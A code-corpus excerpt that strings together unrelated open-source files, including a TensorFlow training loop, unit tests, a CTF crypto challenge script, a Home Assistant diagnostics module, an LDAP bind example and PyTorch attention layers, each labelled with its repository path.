metrics = create_metrics_fn()
logging.info('Creating checkpoint ...')
checkpoint = tf.train.Checkpoint(
model=model,
optimizer=optimizer,
step=optimizer.iterations,
epoch=tf.Variable(0, dtype=tf.int64, trainable=False),
training_finished=tf.Variable(False, dtype=tf.bool, trainable=False))
logging.info('Restoring old model (if exists) ...')
checkpoint_manager = tf.train.CheckpointManager(
checkpoint,
directory=train_folder,
max_to_keep=checkpoint_max_to_keep,
keep_checkpoint_every_n_hours=checkpoint_save_every_n_hours)
with strategy.scope():
if checkpoint_manager.latest_checkpoint:
checkpoint.restore(checkpoint_manager.latest_checkpoint)
logging.info('Creating Timer ...')
timer = tf.estimator.SecondOrStepTimer(every_steps=timing_frequency)
timer.update_last_triggered_step(optimizer.iterations.numpy())
logging.info('Training on devices: %s.', [
el.name.split('/physical_device:')[-1]
for el in tf.config.get_visible_devices()
])
# Re-assign training_finished=False, in case we restored a checkpoint.
checkpoint.training_finished.assign(False)
while optimizer.iterations.numpy() < num_iterations:
for i_batch, batch in enumerate(train_set):
summary_writer.set_as_default()
iterations = optimizer.iterations.numpy()
if iterations % logging_frequency == 0:
# Log epoch, total iterations and batch index.
logging.info('epoch %d; iterations %d; i_batch %d',
checkpoint.epoch.numpy(), iterations,
i_batch)
# Break if the number of iterations exceeds the max.
if iterations >= num_iterations:
break
# Compute distributed step outputs.
distributed_step_outputs = distributed_train_step_fn(
strategy, batch, model, loss_functions, optimizer, iterations)
# Save checkpoint, and optionally run the eval loops.
if iterations % save_checkpoint_frequency == 0:
checkpoint_manager.save(checkpoint_number=iterations)
if eval_datasets is not None:
eval_loop_fn(
strategy=strategy,
eval_base_folder=eval_folder,
model=model,
metrics=metrics,
datasets=eval_datasets,
summary_writer=eval_summary_writer,
checkpoint_step=iterations)
# Write summaries.
if iterations % save_summaries_frequency == 0:
tf.summary.experimental.set_step(step=iterations)
summary_writer_fn(distributed_step_outputs)
tf.summary.scalar('learning_rate',
optimizer.learning_rate(iterations).numpy())
# Log steps/sec.
if timer.should_trigger_for_step(iterations):
elapsed_time, elapsed_steps = timer.update_last_triggered_step(
iterations)
if elapsed_time is not None:
steps_per_second = elapsed_steps / elapsed_time
tf.summary.scalar(
'steps/sec', steps_per_second, step=optimizer.iterations)
# Increment epoch.
checkpoint.epoch.assign_add(1)
# Assign training_finished variable to True after training is finished and
# save the last checkpoint.
checkpoint.training_finished.assign(True)
checkpoint_manager.save(checkpoint_number=optimizer.iterations.numpy())
# Generate a saved model.
model.save(saved_model_folder)
def train(strategy: tf.distribute.Strategy, train_folder: str,
saved_model_folder: str, n_iterations: int,
create_model_fn: Callable[..., tf.keras.Model],
create_losses_fn: Callable[..., Dict[str,
Tuple[Callable[..., tf.Tensor],
Callable[...,
tf.Tensor]]]],
create_metrics_fn: Callable[..., Dict[str, tf.keras.metrics.Metric]],
dataset: tf.data.Dataset,
learning_rate: tf.keras.optimizers.schedules.LearningRateSchedule,
eval_loop_fn: Callable[..., None],
eval_folder: str,
eval_datasets: Dict[str, tf.data.Dataset]):
"""Training function that is strategy agnostic.
Args:
strategy: A Tensorflow distributed strategy.
train_folder: A path to where the summaries event files and checkpoints
will be saved.
saved_model_folder: A path to where the saved models are stored.
n_iterations: An integer, the number of iterations to train for.
create_model_fn: A callable that returns tf.keras.Model.
create_losses_fn: A callable that returns the losses.
create_metrics_fn: A function that returns the metrics dictionary.
dataset: The tensorflow dataset object.
learning_rate: Keras learning rate schedule object.
eval_loop_fn: eval loop function.
eval_folder: A path to where eval summaries event files and checkpoints
will be saved.
eval_datasets: The tensorflow evaluation dataset objects.
"""
train_loop(
strategy=strategy,
train_set=dataset,
create_model_fn=create_model_fn,
create_losses_fn=create_losses_fn,
create_optimizer_fn=functools.partial(
tf.keras.optimizers.Adam, learning_rate=learning_rate),
distributed_train_step_fn=_distributed_train_step,
eval_loop_fn=eval_loop_fn,
create_metrics_fn=create_metrics_fn,
eval_folder=eval_folder,
eval_datasets=eval_datasets,
summary_writer_fn=_summary_writer,
train_folder=train_folder,
saved_model_folder=saved_model_folder,
num_iterations=n_iterations,
save_summaries_frequency=3000,
save_checkpoint_frequency=3000)
def get_strategy(mode) -> tf.distribute.Strategy:
"""Creates a distributed strategy."""
strategy = None
if mode == 'cpu':
strategy = tf.distribute.OneDeviceStrategy('/cpu:0')
elif mode == 'gpu':
strategy = tf.distribute.MirroredStrategy()
else:
raise ValueError('Unsupported distributed mode.')
return strategy
|
testing/test_checker.py
|
MatsLanGoH/xdoctest
| 142 |
128282
|
from xdoctest import checker
from xdoctest import directive
# from xdoctest import utils
def test_visible_lines():
"""
pytest testing/test_checker.py
"""
got = 'this is invisible\ronly this is visible'
print(got)
want = 'only this is visible'
assert checker.check_output(got, want)
def test_visible_lines_explicit():
"""
pytest testing/test_checker.py
"""
got = 'invisible\rIS-visible'
want = 'invisible\rIS-visible'
# The got-want checker is quite permissive.
# Use asserts for non-permissive tests.
assert checker.check_output(got, want)
def test_blankline_accept():
"""
pytest testing/test_checker.py
"""
# Check that blankline is normalized away
runstate = directive.RuntimeState({'DONT_ACCEPT_BLANKLINE': False})
got = 'foo\n\nbar'
want = 'foo\n<BLANKLINE>\nbar'
assert checker.check_output(got, want, runstate)
def test_blankline_failcase():
# Check that blankline is not normalizd in a "got" statement
runstate = directive.RuntimeState({'DONT_ACCEPT_BLANKLINE': False})
got = 'foo\n<BLANKLINE>\nbar'
want = 'foo\n\nbar'
assert not checker.check_output(got, want, runstate)
def test_blankline_not_accept():
# Check that blankline is not normalized away when
# DONT_ACCEPT_BLANKLINE is on
runstate = directive.RuntimeState({'DONT_ACCEPT_BLANKLINE': True})
got = 'foo\n\nbar'
want = 'foo\n<BLANKLINE>\nbar'
assert not checker.check_output(got, want, runstate)
|
2017/EasyCTF/Security Through Obscurity/sage.py
|
Kage/CTF-Writeups
| 191 |
128290
|
<gh_stars>100-1000
p = 196732205348849427366498732223276547339
secret = REDACTED
def calc_root(num, mod, n):
f = GF(mod)
temp = f(num)
return temp.nth_root(n)
def gen_v_list(primelist, p, secret):
a = []
for prime in primelist:
a.append(calc_root(prime, p, secret))
return a
def decodeInt(i, primelist):
pl = sorted(primelist)[::-1]
out = ''
for j in pl:
if i%j == 0:
out += '1'
else:
out += '0'
return out
def bin2asc(b):
return hex(int(b,2)).replace('0x','').decode('hex')
primelist = [2,3,5,7,11,13,17,19,23,29,31,37,43,47,53,59]
message = REDACTED
chunks = []
for i in range(0,len(message),2):
chunks += [message[i:i+2]]
vlist = gen_v_list(primelist,p,secret)
print(vlist)
for chunk in chunks:
binarized = bin(int(chunk.encode('hex'),16)).replace('0b','').zfill(16)[::-1] #lsb first
enc = 1
for bit in range(len(binarized)):
enc *= vlist[bit]**int(binarized[bit])
enc = enc%p
print(enc)
|
homeassistant/components/august/diagnostics.py
|
MrDelik/core
| 30,023 |
128369
|
<filename>homeassistant/components/august/diagnostics.py
"""Diagnostics support for august."""
from __future__ import annotations
from typing import Any
from homeassistant.components.diagnostics import async_redact_data
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from . import AugustData
from .const import DOMAIN
TO_REDACT = {
"HouseID",
"OfflineKeys",
"installUserID",
"invitations",
"key",
"pins",
"pubsubChannel",
"recentImage",
"remoteOperateSecret",
"users",
"zWaveDSK",
}
async def async_get_config_entry_diagnostics(
hass: HomeAssistant, entry: ConfigEntry
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
data: AugustData = hass.data[DOMAIN][entry.entry_id]
return {
"locks": {
lock.device_id: async_redact_data(
data.get_device_detail(lock.device_id).raw, TO_REDACT
)
for lock in data.locks
},
"doorbells": {
doorbell.device_id: async_redact_data(
data.get_device_detail(doorbell.device_id).raw, TO_REDACT
)
for doorbell in data.doorbells
},
}
|
vispy/scene/cameras/tests/test_link.py
|
hmaarrfk/vispy
| 2,617 |
128371
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
from vispy.scene.widgets import ViewBox
from vispy.testing import run_tests_if_main
def test_turntable_camera_link():
vbs = [ViewBox(camera='turntable') for _ in range(3)]
cams = [vb.camera for vb in vbs]
for cam in cams:
cam.elevation = 45.0
cam.azimuth = 120.0
cam.scale_factor = 4.0
cams[0].link(cams[1])
cams[0].link(cams[2], props=['azimuth', 'elevation'])
cams[1].elevation = 30.0
cams[1].azimuth = 90.0
cams[1].scale_factor = 2.0
assert cams[0].elevation == 30.0
assert cams[0].azimuth == 90.0
assert cams[0].scale_factor == 2.0
assert cams[2].elevation == 30.0
assert cams[2].azimuth == 90.0
assert cams[2].scale_factor == 4.0
def test_panzoom_link():
vbs = [ViewBox(camera='panzoom') for _ in range(4)]
cams = [vb.camera for vb in vbs]
for cam in cams:
cam.rect = (0, 0, 100, 100)
cams[0].link(cams[1])
cams[0].link(cams[2], axis='x')
cams[0].link(cams[3], axis='y')
cams[1].rect = (-20, -20, 130, 130)
assert cams[0].rect.pos == (-20, -20) and cams[0].rect.size == (130, 130)
assert cams[2].rect.pos == (-20, 0) and cams[2].rect.size == (130, 100)
assert cams[3].rect.pos == (0, -20) and cams[3].rect.size == (100, 130)
run_tests_if_main()
|
discovery-provider/src/queries/get_route_metrics_test.py
|
ppak10/audius-protocol
| 429 |
128383
|
<reponame>ppak10/audius-protocol
def test():
"""See /tests/test_get_route_metrics.py"""
|
codigo_das_aulas/aula_05/aula_05_03.py
|
VeirichR/curso-python-selenium
| 234 |
128395
|
from selenium.webdriver import Firefox
url = 'http://selenium.dunossauro.live/aula_05_c.html'
firefox = Firefox()
firefox.get(url)
def melhor_filme(browser, filme, email, telefone):
"""Preenche o formulário do melhor filme de 2020."""
browser.find_element_by_name('filme').send_keys(filme)
browser.find_element_by_name('email').send_keys(email)
browser.find_element_by_name('telefone').send_keys(telefone)
browser.find_element_by_name('enviar').click()
melhor_filme(
firefox,
'Parasita',
'<EMAIL>',
'(019)987654321'
)
firefox.quit()
|
src/aptsources_cleanup/util/version/__main__.py
|
butayama/aptsources-cleanup
| 461 |
128475
|
<gh_stars>100-1000
# -*- coding: utf-8
"""Genreate the content of a ._data module for use witht this package"""
import sys, locale
from . import version_info
locale.setlocale(locale.LC_ALL, '')
if len(sys.argv) > 1:
version = sys.argv[1]
else:
version = input()
output = sys.stdout
if not output.encoding:
import codecs
encoding = locale.getpreferredencoding()
output = codecs.getwriter(encoding)(output)
output.encoding = encoding
with output:
version_info.from_repo(version)._print_data_module(output)
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py
|
justinforbes/zuthaka
| 129 |
128482
|
<gh_stars>100-1000
from .covenantc2 import *
|
test/hummingbot/connector/exchange/bitmart/test_bitmart_auth.py
|
BGTCapital/hummingbot
| 3,027 |
128507
|
<reponame>BGTCapital/hummingbot<filename>test/hummingbot/connector/exchange/bitmart/test_bitmart_auth.py
import json
import hmac
import hashlib
from unittest import TestCase
from hummingbot.connector.exchange.bitmart.bitmart_auth import BitmartAuth
class BitmartAuthTests(TestCase):
@property
def memo(self):
return '001'
@property
def api_key(self):
return 'test_api_key'
@property
def secret_key(self):
return 'test_secret_key'
def test_no_authentication_headers(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
headers = auth.get_headers()
self.assertEqual(1, len(headers))
self.assertEqual('application/json', headers.get('Content-Type'))
def test_keyed_authentication_headers(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
headers = auth.get_headers(auth_type="KEYED")
self.assertEqual(2, len(headers))
self.assertEqual('application/json', headers.get("Content-Type"))
self.assertEqual('test_api_key', headers.get('X-BM-KEY'))
def test_signed_authentication_headers(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
timestamp = '1589793795969'
params = {'test_key': 'test_value'}
headers = auth.get_headers(timestamp=timestamp, params=params, auth_type="SIGNED")
params = json.dumps(params)
raw_signature = f'{timestamp}#{self.memo}#{params}'
expected_signature = hmac.new(self.secret_key.encode('utf-8'),
raw_signature.encode('utf-8'),
hashlib.sha256).hexdigest()
self.assertEqual(4, len(headers))
self.assertEqual('application/json', headers.get("Content-Type"))
self.assertEqual('test_api_key', headers.get('X-BM-KEY'))
self.assertEqual(expected_signature, headers.get('X-BM-SIGN'))
self.assertEqual('1589793795969', headers.get('X-BM-TIMESTAMP'))
def test_ws_auth_payload(self):
auth = BitmartAuth(api_key=self.api_key, secret_key=self.secret_key, memo=self.memo)
timestamp = '1589793795969'
auth_info = auth.get_ws_auth_payload(timestamp=timestamp)
raw_signature = f'{timestamp}#{self.memo}#bitmart.WebSocket'
expected_signature = hmac.new(self.secret_key.encode('utf-8'),
raw_signature.encode('utf-8'),
hashlib.sha256).hexdigest()
self.assertEqual(2, len(auth_info))
self.assertEqual(3, len(auth_info.get('args')))
self.assertEqual('login', auth_info.get('op'))
self.assertEqual(['test_api_key', '1589793795969', expected_signature], auth_info.get('args'))
|
ui/file_manager/file_manager/test/scripts/create_test_main.py
|
zipated/src
| 2,151 |
128508
|
#!/usr/bin/env python
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Copies file_manager/main.html to file_manager/test.html.
Modifies it to be able to run the CrOS FileManager app
as a regular web page in a single renderer.
"""
import argparse
import os
import sys
assert __name__ == '__main__'
parser = argparse.ArgumentParser()
parser.add_argument('--output')
args = parser.parse_args()
# ROOT=//ui/file_manager/file_manager
ROOT = os.path.abspath(os.path.join(sys.path[0], '../..'))
scripts = []
GENERATED_HTML = ('<!-- Generated by:\n -- ui/file_manager/file_manager/'
'tests/scripts/create_test_main.py\n -->\n\n')
GENERATED_JS = ('// Generated by:\n// ui/file_manager/file_manager/'
'tests/scripts/create_test_main.py\n\n')
def read(path):
with open(os.path.join(ROOT, path)) as f:
return f.read()
def write(path, content):
fullpath = os.path.join(ROOT, path)
if not os.path.exists(os.path.dirname(fullpath)):
os.makedirs(os.path.dirname(fullpath))
with open(fullpath, 'w') as f:
f.write(content)
def replaceline(f, match, lines):
"""Replace matching line in file with lines."""
for i in range(len(f)):
if match in f[i]:
return f[:i] + lines + f[i+1:]
return f
def includes2scripts(include_filename):
"""Convert <include src='foo'> to <script src='<prefix>foo'></script>."""
scripts.append('<!-- %s -->' % include_filename)
prefix = include_filename[:include_filename.rindex('/')+1]
f = read(include_filename).split('\n')
for i in range(len(f)):
l = f[i]
# Join back any include with a line-break.
if l == '// <include' and f[i+1].startswith('// src='):
f[i+1] = l + f[i+1][2:]
continue
if l.startswith('// <include '):
l = l.replace('// <include ', '<script ')
# Special fix for analytics.
if 'webui/resources/js/analytics.js' in l:
l = l.replace('webui/resources/js/analytics.js',
'../third_party/analytics/google-analytics-bundle.js')
# main.js should be defer.
if 'src="main.js"' in l:
l = l.replace('src="main.js"', 'src="main.js" defer')
# Fix the path for scripts to be relative to ROOT.
if 'src="../../' in l:
l = l.replace('src="../../', 'src="')
else:
l = l.replace('src="', 'src="' + prefix)
tag = l + '</script>'
if tag not in scripts:
scripts.append(tag)
# Fix link to action_link.css and text_defaults.css.
main_html = (read('main.html')
.replace('chrome://resources/css/action_link.css',
'../../webui/resources/css/action_link.css')
.replace('chrome://resources/css/text_defaults.css',
'test/gen/css/text_defaults.css')
.split('\n'))
# Fix text_defaults.css. Copy and replace placeholders.
text_defaults = (read('../../webui/resources/css/text_defaults.css')
.replace('$i18n{textDirection}', 'ltr')
.replace('$i18nRaw{fontFamily}', 'Roboto, sans-serif')
.replace('$i18nRaw{fontSize}', '75%'))
write('test/gen/css/text_defaults.css', GENERATED_HTML + text_defaults)
# Fix stylesheet from extension.
main_html = replaceline(
main_html,
('chrome-extension://fbjakikfhfdajcamjleinfciajelkpek/'
'cws_widget/cws_widget_container.css'),
[('<link rel="stylesheet" href="../../../components/chrome_apps/'
'webstore_widget/cws_widget/cws_widget_container.css">')])
# Add scripts required for testing, and the test files (test/*.js).
scripts.append('<!-- required for testing -->')
scripts += ['<script src="%s"></script>' % s for s in [
'test/js/chrome_api_test_impl.js',
'../../webui/resources/js/assert.js',
'../../webui/resources/js/cr.js',
'../../webui/resources/js/cr/event_target.js',
'../../webui/resources/js/cr/ui/array_data_model.js',
'../../webui/resources/js/load_time_data.js',
'../../webui/resources/js/webui_resource_test.js',
'test/js/strings.js',
'common/js/util.js',
'common/js/mock_entry.js',
'common/js/volume_manager_common.js',
'background/js/volume_info_impl.js',
'background/js/volume_info_list_impl.js',
'background/js/volume_manager_impl.js',
'background/js/mock_volume_manager.js',
'foreground/js/constants.js',
'test/js/chrome_file_manager.js',
'test/js/test_util.js',
] + ['test/' + s for s in os.listdir(os.path.join(ROOT, 'test'))
if s.endswith('.js')]]
# Convert all includes from:
# * foreground/js/main_scripts.js
# * background/js/background_common_scripts.js
# * background/js/background_scripts.js
# into <script> tags in main.html.
# Add polymer libs at start.
bg_scripts = read('background/js/background_scripts.js').split('\n')
includes2scripts('foreground/js/main_scripts.js')
includes2scripts('background/js/background_common_scripts.js')
includes2scripts('background/js/background_scripts.js')
main_html = replaceline(main_html, 'foreground/js/main_scripts.js', [
('<link rel="import" href="../../../third_party/polymer/v1_0/'
'components-chromium/polymer/polymer.html">'),
('<link rel="import" href="../../../third_party/polymer/v1_0/'
'components-chromium/paper-progress/paper-progress.html">'),
] + scripts)
# Load QuickView in iframe rather than webview.
# Change references in files_quick_view.html to use updated
# files_safe_media.html which will use webview rather than iframe,
# and sets src directly on iframe.
for filename, substitutions in (
('elements/files_quick_view.html', (
('="files_icon', '="../../../foreground/elements/files_icon'),
('="files_metadata', '="../../../foreground/elements/files_metadata'),
('="files_tooltip', '="../../../foreground/elements/files_tooltip'),
('="files_quick', '="../../../foreground/elements/files_quick'),
('="icons', '="../../../foreground/elements/icons'),
('webview', 'iframe'),
)),
('elements/files_safe_media.html', (('webview', 'iframe'),)),
('elements/files_safe_media.js', (
("'webview'", "'iframe'"),
("'contentload'", "'load'"),
('this.webview_.contentWindow.postMessage(data, FILES_APP_ORIGIN);',
('this.webview_.contentWindow.content.type = this.type;'
'this.webview_.contentWindow.content.src = this.src;')),
)),
):
buf = read('foreground/' + filename)
for old, new in substitutions:
buf = buf.replace(old, new)
write('test/gen/' + filename, GENERATED_JS + buf)
main_html = replaceline(main_html, 'foreground/' + filename,
['<script src="test/gen/%s"></script>' % filename])
test_html = GENERATED_HTML + '\n'.join(main_html)
write('test.html', test_html)
# If --output is provided, also create specified file.
if args.output:
with open(args.output, 'w') as output:
output.write(test_html)
|
egs/voxceleb/v1/nnet/lib/train_mt.py
|
LCF2764/tf-kaldi-speaker
| 154 |
128580
|
<reponame>LCF2764/tf-kaldi-speaker
import os
import argparse
import random
import sys
import tensorflow as tf
import numpy as np
from misc.utils import ValidLoss, load_lr, load_valid_loss, save_codes_and_config, compute_cos_pairwise_eer
from dataset.multitask.data_loader_v2 import KaldiDataRandomQueueV2
from dataset.kaldi_io import FeatureReaderV2
from six.moves import range
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--cont", action="store_true", help="Continue training from an existing model.")
parser.add_argument("--config", type=str, help="The configuration file.")
parser.add_argument("train_data_dir", type=str, help="The data directory of the training set.")
parser.add_argument("train_ali_dir", type=str, help="The ali directory of the training set.")
parser.add_argument("train_spklist", type=str, help="The spklist file maps the TRAINING speakers to the indices.")
parser.add_argument("valid_data_dir", type=str, help="The data directory of the validation set.")
parser.add_argument("valid_ali_dir", type=str, help="The ali directory of the validation set.")
parser.add_argument("valid_spklist", type=str, help="The spklist maps the VALID speakers to the indices.")
parser.add_argument("model", type=str, help="The output model directory.")
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.DEBUG)
args = parser.parse_args()
params = save_codes_and_config(args.cont, args.model, args.config)
# The model directory always has a folder named nnet
model_dir = os.path.join(args.model, "nnet")
# Set the random seed. The random operations may appear in data input, batch forming, etc.
tf.set_random_seed(params.seed)
random.seed(params.seed)
np.random.seed(params.seed)
if args.cont:
# If we continue training, we can figure out how much steps the model has been trained,
# using the index of the checkpoint
import re
ckpt = tf.train.get_checkpoint_state(model_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
step = int(next(re.finditer("(\d+)(?!.*\d)", ckpt_name)).group(0))
else:
sys.exit("Cannot load checkpoint from %s" % model_dir)
start_epoch = int(step / params.num_steps_per_epoch)
else:
start_epoch = 0
learning_rate = params.learning_rate
learning_rate_array = []
if os.path.isfile(str(learning_rate)):
with open(str(learning_rate), "r") as f:
for line in f.readlines():
learning_rate_array.append(float(line.strip()))
# The size of the file should be large enough
assert len(learning_rate_array) > params.num_epochs, "The learning rate file is shorter than the num of epochs."
tf.logging.info("Using specified learning rate decay strategy.")
else:
# The learning rate is determined by the training process. However, if we continue training,
# the code doesn't know the previous learning rate if it is tuned using the validation set.
# To solve that, just save the learning rate to an individual file.
if os.path.isfile(os.path.join(model_dir, "learning_rate")):
learning_rate_array = load_lr(os.path.join(model_dir, "learning_rate"))
assert len(learning_rate_array) == start_epoch + 1, "Not enough learning rates in the learning_rate file."
else:
learning_rate_array = [float(learning_rate)] * (start_epoch + 1)
feat_reader = FeatureReaderV2(args.train_data_dir, args.train_ali_dir,
params.phone_left_context, params.phone_right_context)
dim = feat_reader.get_dim()
with open(os.path.join(model_dir, "feature_dim"), "w") as f:
f.write("%d\n" % dim)
feat_reader = KaldiDataRandomQueueV2(args.train_data_dir, args.train_ali_dir, args.train_spklist,
left_context=params.phone_left_context,
right_context=params.phone_right_context)
num_total_speakers = feat_reader.num_total_speakers
num_total_phones = feat_reader.num_total_phones
tf.logging.info("There are %d speakers and %d phones in the training set." % (num_total_speakers, num_total_phones))
tf.logging.info("The dim is %d." % dim)
with open(os.path.join(model_dir, "num_speakers"), "w") as f:
f.write("%d\n" % num_total_speakers)
with open(os.path.join(model_dir, "num_phones"), "w") as f:
f.write("%d\n" % num_total_phones)
# Load the history valid loss
min_valid_loss = ValidLoss()
if os.path.isfile(os.path.join(model_dir, "valid_loss")):
min_valid_loss = load_valid_loss(os.path.join(model_dir, "valid_loss"))
# TODO: Change the model name to train different models
from model.multitask_v1.base_v1 import BaseMT
trainer = BaseMT(params, args.model, dim, num_total_speakers, num_total_phones)
trainer.build("train")
trainer.build("valid")
if "early_stop_epochs" not in params.dict:
params.dict["early_stop_epochs"] = 10
if "min_learning_rate" not in params.dict:
params.dict["min_learning_rate"] = 1e-5
for epoch in range(start_epoch, params.num_epochs):
trainer.train(args.train_data_dir, args.train_ali_dir, args.train_spklist, learning_rate_array[epoch])
valid_loss, valid_embeddings, valid_labels = trainer.valid(args.valid_data_dir,
args.valid_ali_dir,
args.valid_spklist,
batch_type=params.batch_type,
output_embeddings=True)
eer = compute_cos_pairwise_eer(valid_embeddings, valid_labels)
tf.logging.info("[INFO] Valid EER: %f" % eer)
# Tune the learning rate if necessary.
if not os.path.isfile(str(learning_rate)):
new_learning_rate = learning_rate_array[epoch]
if valid_loss < min_valid_loss.min_loss:
min_valid_loss.min_loss = valid_loss
min_valid_loss.min_loss_epoch = epoch
else:
if epoch - min_valid_loss.min_loss_epoch >= params.reduce_lr_epochs:
new_learning_rate /= 2
# If the valid loss in the next epoch still does not reduce, the learning rate will keep reducing.
tf.logging.info("After epoch %d, no improvement. Reduce the learning rate to %.8f" % (
min_valid_loss.min_loss_epoch, new_learning_rate))
min_valid_loss.min_loss_epoch += 2
learning_rate_array.append(new_learning_rate)
if epoch == 0:
# If this is the first epoch, the first learning rate should be recorded
with open(os.path.join(model_dir, "learning_rate"), "a") as f:
f.write("0 %.8f\n" % learning_rate_array[0])
# Save the learning rate and loss for each epoch.
with open(os.path.join(model_dir, "learning_rate"), "a") as f:
f.write("%d %.8f\n" % (epoch + 1, learning_rate_array[epoch + 1]))
with open(os.path.join(model_dir, "valid_loss"), "a") as f:
f.write("%d %f %f\n" % (epoch, valid_loss, eer))
if not os.path.isfile(str(learning_rate)):
# If the learning rate is too small, the training is actually get stuck.
# Also early stop is applied.
# This is only applied when the learning rate is not specified.
if learning_rate_array[epoch + 1] < (params.min_learning_rate - 1e-12) or \
epoch - min_valid_loss.min_loss_epoch >= params.early_stop_epochs:
break
# Close the session before we exit.
trainer.close()
|
tests/class_free.py
|
ZYAZP/python2
| 1,062 |
128652
|
<filename>tests/class_free.py
def f(x):
class c:
print x
f(3)
|
examples/ldap.py
|
cromulencellc/asn1tools
| 198 |
128654
|
#!/usr/bin/env python
"""Perform an LDAP bind with an LDAP server.
Example execution:
$ ./ldap.py
Connecting to ldap.forumsys.com:389... done.
{'messageID': 1,
'protocolOp': ('bindRequest',
{'authentication': ('simple', b'password'),
'name': b'uid=tesla,dc=example,dc=com',
'version': 3})}
Sending LDAP bind request to the server... done.
Receiving LDAP bind response from the server... done.
{'messageID': 1,
'protocolOp': ('bindResponse',
{'diagnosticMessage': bytearray(b''),
'matchedDN': bytearray(b''),
'resultCode': 'success'})}
{'messageID': 2,
'protocolOp': ('searchRequest',
{'attributes': [],
'baseObject': '',
'derefAliases': 'neverDerefAliases',
'filter': ('substrings',
{'substrings': [('any', 'fred')], 'type': 'cn'}),
'scope': 'wholeSubtree',
'sizeLimit': 0,
'timeLimit': 0,
'typesOnly': False})}
Sending LDAP search request to the server... done.
Receiving LDAP search response from the server... done.
{'messageID': 2,
'protocolOp': ('searchResDone',
{'diagnosticMessage': bytearray(b''),
'matchedDN': bytearray(b''),
'resultCode': 'noSuchObject'})}
$
"""
from __future__ import print_function
import os
import socket
from pprint import pprint
import asn1tools
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
RFC4511_ASN_PATH = os.path.join(SCRIPT_DIR,
'..',
'tests',
'files',
'ietf',
'rfc4511.asn')
HOST = 'ldap.forumsys.com'
PORT = 389
db = asn1tools.compile_files(RFC4511_ASN_PATH)
# Connect to the LDAP server.
sock = socket.socket()
print('Connecting to {}:{}... '.format(HOST, PORT), end='')
sock.connect((HOST, PORT))
print('done.')
print()
# Encode the LDAP bind request and send it to the server.
bind_request = {
'messageID': 1,
'protocolOp': (
'bindRequest',
{
'version': 3,
'name': b'uid=tesla,dc=example,dc=com',
'authentication': (
'simple', b'password'
)
}
)
}
encoded_bind_request = db.encode('LDAPMessage', bind_request)
pprint(bind_request)
print('Sending LDAP bind request to the server... ', end='')
sock.sendall(encoded_bind_request)
print('done.')
# Receive the bind response, decode it, and print it.
print('Receiving LDAP bind response from the server... ', end='')
encoded_bind_response = sock.recv(2)
length = db.decode_length(encoded_bind_response)
encoded_bind_response += sock.recv(length - 2)
print('done.')
bind_response = db.decode('LDAPMessage', encoded_bind_response)
pprint(bind_response)
print()
# Encode the LDAP search request and send it to the server.
search_request = {
'messageID': 2,
'protocolOp': (
'searchRequest',
{
'baseObject': b'',
'scope': 'wholeSubtree',
'derefAliases': 'neverDerefAliases',
'sizeLimit': 0,
'timeLimit': 0,
'typesOnly': False,
'filter': (
'substrings',
{
'type': b'\x63\x6e',
'substrings': [
('any', b'\x66\x72\x65\x64')
]
}
),
'attributes': [
]
}
)
}
encoded_search_request = db.encode('LDAPMessage', search_request)
pprint(search_request)
print('Sending LDAP search request to the server... ', end='')
sock.sendall(encoded_search_request)
print('done.')
# Receive the search response, decode it, and print it.
print('Receiving LDAP search response from the server... ', end='')
encoded_search_response = sock.recv(2)
length = db.decode_length(encoded_search_response)
encoded_search_response += sock.recv(length - 2)
print('done.')
search_response = db.decode('LDAPMessage', encoded_search_response)
pprint(search_response)
sock.close()
|
finrl_meta/env_execution_optimizing/order_execution_qlib/trade/network/util.py
|
eitin-infant/FinRL-Meta
| 214 |
128659
|
<filename>finrl_meta/env_execution_optimizing/order_execution_qlib/trade/network/util.py
import torch
import numpy as np
from torch import nn
import torch.nn.functional as F
from copy import deepcopy
import sys
from tianshou.data import to_torch
class Attention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.get_w = nn.Sequential(nn.Linear(in_dim * 2, in_dim), nn.ReLU(), nn.Linear(in_dim, 1))
self.fc = nn.Sequential(nn.Linear(in_dim, out_dim), nn.ReLU(),)
def forward(self, value, key):
key = key.unsqueeze(dim=1)
length = value.shape[1]
key = key.repeat([1, length, 1])
weight = self.get_w(torch.cat((key, value), dim=-1)).squeeze() # B * l
weight = weight.softmax(dim=-1).unsqueeze(dim=-1) # B * l * 1
out = (value * weight).sum(dim=1)
out = self.fc(out)
return out
class MaskAttention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.get_w = nn.Sequential(nn.Linear(in_dim * 2, in_dim), nn.ReLU(), nn.Linear(in_dim, 1))
self.fc = nn.Sequential(nn.Linear(in_dim, out_dim), nn.ReLU(),)
def forward(self, value, key, seq_len, maxlen=9):
# seq_len: (batch,)
device = value.device
key = key.unsqueeze(dim=1)
length = value.shape[1]
key = key.repeat([1, length, 1]) # (batch, 9, 64)
weight = self.get_w(torch.cat((key, value), dim=-1)).squeeze(-1) # (batch, 9)
mask = sequence_mask(seq_len + 1, maxlen=maxlen, device=device)
weight[~mask] = float("-inf")
weight = weight.softmax(dim=-1).unsqueeze(dim=-1)
out = (value * weight).sum(dim=1)
out = self.fc(out)
return out
class TFMaskAttention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.get_w = nn.Sequential(nn.Linear(in_dim * 2, in_dim), nn.ReLU(), nn.Linear(in_dim, 1))
self.fc = nn.Sequential(nn.Linear(in_dim, out_dim), nn.ReLU(),)
def forward(self, value, key, seq_len, maxlen=9):
device = value.device
key = key.unsqueeze(dim=1)
length = value.shape[1]
key = key.repeat([1, length, 1])
